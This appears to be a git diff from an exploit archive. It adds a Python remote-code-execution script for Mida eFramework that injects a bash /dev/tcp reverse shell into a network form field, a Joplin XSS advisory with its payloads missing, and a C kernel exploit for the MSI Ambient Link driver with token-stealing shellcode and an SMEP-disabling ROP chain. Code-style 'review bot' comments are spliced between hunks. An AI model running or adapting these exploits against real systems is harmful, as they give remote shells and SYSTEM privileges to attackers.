diff --git a/exploits/hardware/webapps/48835.py b/exploits/hardware/webapps/48835.py
new file mode 100755
index 000000000..f40e1a5c4
--- /dev/null
+++ b/exploits/hardware/webapps/48835.py
@@ -0,0 +1,78 @@
+# Exploit Title: Mida eFramework 2.8.9 - Remote Code Execution
+# Google Dork: Server: Mida eFramework
+# Date: 2020-08-27
+# Exploit Author: elbae
+# Vendor Homepage: https://www.midasolutions.com/
+# Software Link: http://ova-efw.midasolutions.com/
+# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+# Version: <= 2.8.9
+# CVE : CVE-2020-15922
+
+
+#! /usr/bin/python3
+# -*- coding: utf-8 -*-
+
+import argparse
+import base64
+import random
+import requests
+import subprocess
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def print_disclaimer():
+ print("""
+ ---------------------
+ Disclaimer:
+ 1) For testing purpose only.
+ 2) Do not attack production environments.
+ 3) Intended for educational purposes only and cannot be used for law
+violation or personal gain.
+ 4) The author is not responsible for any possible harm caused by this
+material.
+ ---------------------""")
+
+
+def print_info():
+ print("""
+[*] PoC exploit for Mida eFramework 2.8.9 PDC (CVE-2020-15922)
+[*] Reference:https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+[*] Vulnerability: OS Command Injection RCE in PDC/pages/network.php -
+Reverse Shell
+ ./CVE-2020-15922 http://192.168.1.60:8090/PDC/pages/network.php rev-IP
+rev-PORT """)
+
+def run_cmd(url,ip,port):
+ rev_shell = "sudo bash -i >& /dev/tcp/{0}/{1} 0>&1".format(ip,port)
+ print("[+] Reverse shell: {0}".format(rev_shell))
+ data = {
+ "submit":"True",
+ "ipaddress0":"; {0}".format(rev_shell),
+ "netmask0":"",
+ "gateway0":"",
+ "dns1":"",
+ "dns2":""
+ }
+ # exec rev shell
+ print("[*] Starting reverse shell to {0} {1}...".format(ip,port))
+ try:
+ r = requests.post(url,data=data,verify=False,timeout=1)
+ except requests.exceptions.ReadTimeout:
+ print("[?] ...check if it worked")
+ pass
+
+def main():
+ print_info()
+ print_disclaimer()
+ parser = argparse.ArgumentParser()
+ parser.add_argument("target", type=str,
+ help="the complete target URL")
+ parser.add_argument("ip", type=str,
+ help="the ip address for reverse shell")
+ parser.add_argument("port", type=str,
+ help="the port for reverse shell")
+ args = parser.parse_args()
+ run_cmd(args.target, args.ip, args.port)
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48837.txt b/exploits/multiple/webapps/48837.txt
new file mode 100644
index 000000000..ce047ed25
--- /dev/null
+++ b/exploits/multiple/webapps/48837.txt
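Review bot: `base64`, `random` and `subprocess` (new-file lines 16, 17 and 19) are imported but never referenced anywhere in the hunk, and the `#! /usr/bin/python3` shebang on line 12 sits below the header comment block where the loader ignores it; move the shebang to line 1 and drop the three unused imports. In `run_cmd`, the `pass` after `print("[?] ...check if it worked")` is dead, and the `r` bound from `requests.post` is never read, so the call can stand alone as `requests.post(url,data=data,verify=False,timeout=1)`. The `print_info` docstring-style banner is the only usage documentation; a one-line module docstring at the top stating the script's purpose and the `target ip port` positional arguments would make `main` self-describing.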
@@ -0,0 +1,49 @@
+# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC)
+# Date: 2020-09-21
+# Exploit Author: Ademar Nowasky Junior (@nowaskyjr)
+# Vendor Homepage: https://joplinapp.org/
+# Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe
+# Version: 1.0.190 to 1.0.245
+# Tested on: Windows / Linux
+# CVE : CVE-2020-15930
+# References:
+# https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff
+
+# 1. Technical Details
+# An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
+# HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE.
+# If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application.
+
+# 2. PoC
+# Paste the following payload into a note:
+
+
+
+# 2.1 RCE with user interaction
+# Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit.
+# By default, notes are stored in the last notebook created.
+
+
+
+
+# To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint.
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/local/48836.c b/exploits/windows/local/48836.c
new file mode 100644
index 000000000..08a9950fe
--- /dev/null
+++ b/exploits/windows/local/48836.c
@@ -0,0 +1,158 @@
+/*
+Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation
+Date: 2020-09-24
+Exploit Author: Matteo Malvica
+Vendor Homepage: https://www.msi.com
+Software Link: https://msi.gm/ABLTMNB
+Driver: MSIO64.sys
+SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD
+Version: 1.0.0.8
+Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406]
+MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation
+CVE: CVE-2020-17382
+Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/
+Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities
+*/
+
+#include
+#include
+#include
+#include
+
+#pragma warning( disable : 6387 )
+
+VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) {
+ // SHELLCODE FOR 1709
+ BYTE token_steal[] =
+ "\x65\x48\x8B\x14\x25\x88\x01\x00\x00" // mov rdx, [gs:188h] ; Get _ETHREAD pointer from KPCR
+ "\x4C\x8B\x82\xB8\x00\x00\x00" // mov r8, [rdx + b8h] ; _EPROCESS (kd> u PsGetCurrentProcess)
+ "\x4D\x8B\x88\xe8\x02\x00\x00" // mov r9, [r8 + 2e8h] ; ActiveProcessLinks list head
+ "\x49\x8B\x09" // mov rcx, [r9] ; Follow link to first process in list
+ //find_system_proc:
+ "\x48\x8B\x51\xF8" // mov rdx, [rcx - 8] ; Offset from ActiveProcessLinks to UniqueProcessId
+ "\x48\x83\xFA\x04" // cmp rdx, 4 ; Process with ID 4 is System process
+ "\x74\x05" // jz found_system ; Found SYSTEM token
+ "\x48\x8B\x09" // mov rcx, [rcx] ; Follow _LIST_ENTRY Flink pointer
+ "\xEB\xF1" // jmp find_system_proc ; Loop
+ //found_system:
+ "\x48\x8B\x41\x70" // mov rax, [rcx + 70h] ; Offset from ActiveProcessLinks to Token
+ "\x24\xF0" // and al, 0f0h ; Clear low 4 bits of _EX_FAST_REF structure
+ //find cmd
+ "\x48\x8B\x51\xF8" // mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId
+ "\x48\x81\xFA\x99\x99\x00\x00" // cmp rdx, 0d54h ;UniqueProcessId == ZZZZ? (PLACEHOLDER)
+ "\x74\x05" // jz found_cmd ;YES - move on
+ "\x48\x8B\x09" // mov rcx, [rcx] ;NO - next entry in list
+ "\xEB\xEE" // jmp find_cmd ;loop
+ // found cmd
+ "\x48\x89\x41\x70" // mov [rcx+70h], rax ;copy SYSTEM token over top of this process's token
+ "\x48\x31\xc9" // xor rcx rcx ; clear some registers to avoid issues while unwinding the call stack
+ "\x48\x31\xc0" // xor rax rax
+ "\x48\x31\xf6" // xor rsi,rsi
+ "\x48\x31\xff" // xor rdi, rdi
+ "\x4D\x31\xC0" // xor r8, r8
+ "\x48\xc7\xc1\xf8\x06\x15\x00" // mov rcx, 0x1506f8 ; move original cr4 value into rcx
+ "\xc3"; // ret ; RET
+
+ token_steal[54] = pid;
+ token_steal[55] = pid >> 8;
+
+ LPVOID allocated_shellcode = VirtualAlloc(NULL,
+ sizeof(token_steal),
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_EXECUTE_READWRITE);
+
+ memcpy(allocated_shellcode, token_steal, sizeof(token_steal));
+
+ INT64 pop_rcx_offset = kernel_base + 0x15fc70; // gadget 1 1709 - pop rcx ; ret
+ INT64 mov_cr4_offset = kernel_base + 0x76a02; // gadget 2 1709 - mov cr4, ecx ; ret
+ INT64 wbindv_offset = kernel_base + 0x1175c0;; // gadget 3 1709 - wbinvd; ret
+ INT64 rcx_value = 0x506f8; // value we want placed in cr4 in order to disable SMEP
+ INT64 rcx_old_value = 0x1506f8; // original cr4 value
+ INT64 ret = pop_rcx_offset + 1; // RET NOP
+
+ puts("[+] SMEP disabled");
+
+ BYTE input_buff[136] = { 0 };
+ memset(input_buff, '\x41', 64);
+ memset(input_buff, '\x42', 8); // dummy RBP
+ memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8); // pop rcx
+ memcpy(input_buff + 80, (PINT64)&rcx_value, 8); // disable SMEP value
+ memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
+ memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8); // wbinvd; ret
+ memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode
+ memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
+ memcpy(input_buff + 120, (PINT64)&ret, 8); // RETNOP to restore the stack
+ memcpy(input_buff + 128, (PINT64)&ret, 8); // RETNOP to restore the stack
+
+ printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode);
+
+ DWORD lpBytesReturned = 0x0;
+ BOOL triggerIOCTL = DeviceIoControl(hFile,
+ IoControlCode,
+ input_buff,
+ sizeof(input_buff),
+ NULL,
+ 0,
+ &lpBytesReturned,
+ NULL);
+
+ if (!triggerIOCTL) {
+ printf("[!] DeviceIoControl failed: %d\n", GetLastError());
+ }
+ else {
+ puts("[+] SMEP re-enabled");
+ puts("[+] Enjoy your SYSTEM shell\n");
+ }
+
+ system("start cmd.exe");
+}
+
+LPVOID GetBaseAddr(const char* drvname) {
+ LPVOID drivers[1024];
+ DWORD cbNeeded;
+ int nDrivers, i = 0;
+
+ if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
+ char szDrivers[1024];
+ nDrivers = cbNeeded / sizeof(drivers[0]);
+ for (i = 0; i < nDrivers; i++) {
+ if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
+ if (strcmp(szDrivers, drvname) == 0) {
+ return drivers[i];
+ }
+ }
+ }
+ }
+ return 0;
+}
+
+HANDLE GetDriverHandle() {
+ HANDLE hMsio;
+
+ hMsio = CreateFileA("\\\\.\\MsIo",
+ FILE_READ_ACCESS | FILE_WRITE_ACCESS,
+ FILE_SHARE_READ | FILE_SHARE_WRITE,
+ NULL,
+ OPEN_EXISTING,
+ FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
+ NULL);
+
+ if (hMsio == INVALID_HANDLE_VALUE) {
+ printf("[-] Error obtaining an handle to the driver: %d\n", GetLastError());
+ exit(1);
+ }
+
+ return hMsio;
+}
+
+int main() {
+ puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica");
+ DWORD IoControlCode = 0x80102040;
+ HANDLE hDevice = GetDriverHandle();
+ INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe");
+ DWORD pid = GetCurrentProcessId();
+
+ eopMsio(hDevice, nt, pid, IoControlCode);
+
+ return 0;
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 72a840fa8..f1b3b15d7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
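Review bot: As rendered here the four `#include` directives (new-file lines 17–20) carry no header name, so the listing cannot compile as shown; this looks like angle-bracketed names stripped during rendering rather than a defect in the commit, but it is worth confirming the committed file still has them. `INT64 wbindv_offset = kernel_base + 0x1175c0;;` has a doubled semicolon and misspells the mnemonic that its own comment spells `wbinvd`; `INT64 wbinvd_offset = kernel_base + 0x1175c0; // gadget 3 1709 - wbinvd; ret` with the later `memcpy` reference renamed to match reads cleaner. `rcx_old_value` is assigned and never read, so it can be dropped or folded into the comment on the `mov rcx, 0x1506f8` shellcode line that already documents the value. `eopMsio`, `GetBaseAddr`, `GetDriverHandle` and `main` have no header comment; a one-line purpose comment on each, stating that every offset is specific to the 1709 build named in the header, would make the hard-coded constants self-explaining.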
@@ -10383,6 +10383,7 @@ id,file,description,date,author,type,platform,port
 48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows,
 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,
 48821,exploits/windows/local/48821.txt,"ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path",2020-09-21,"Burhanettin Ozgenc",local,windows,
+48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -40658,6 +40659,8 @@ id,file,description,date,author,type,platform,port
 48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,
 48833,exploits/multiple/webapps/48833.txt,"B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)",2020-09-25,LiquidWorm,webapps,multiple,
 48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple,
+48835,exploits/hardware/webapps/48835.py,"Mida eFramework 2.8.9 - Remote Code Execution",2020-09-28,elbae,webapps,hardware,
+48837,exploits/multiple/webapps/48837.txt,"Joplin 1.0.245 - Arbitrary Code Execution (PoC)",2020-09-28,"Ademar Nowasky Junior",webapps,multiple,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,